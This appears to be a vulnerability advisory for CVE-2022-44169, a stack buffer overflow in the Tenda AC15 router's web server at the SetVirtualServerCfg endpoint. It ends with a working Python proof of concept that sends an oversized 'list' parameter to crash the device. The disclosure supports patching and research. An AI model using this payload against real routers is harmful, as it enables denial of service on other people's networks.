Headline
CVE-2022-44169: IoT_vuln/Tenda/AC15/formSetVirtualSer at main · RobinWang825/IoT_vuln
Tenda AC15 V15.03.05.18 is vulnerable to Buffer Overflow via function formSetVirtualSer.
Tenda AC15(V15.03.05.18) has a Buffer Overflow Vulnerability****Product
- product information: https://www.tenda.com.cn/
- firmware download:https://www.tenda.com.cn/download/detail-2710.html
Affected version
V15.03.05.18
Vulnerability
The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetVirtualSer function, which can be accessed through the URL goform/SetVirtualServerCfg.
In function formSetVirtualSer, the content obtained by the program from the parameter list is passed to v5, and then the v5 is passed into the sub_76858 function as the second argument.
In sub_76858 function, the function sscanf is called to split it and copy to stack buffer without checking its length.
PoC
Poc of Denial of Service(DoS)
import requests data = { b"list": b’A’*0x400+b’~’ } res = requests.post("http://192.168.0.1/goform/SetVirtualServerCfg", data=data) print(res.content)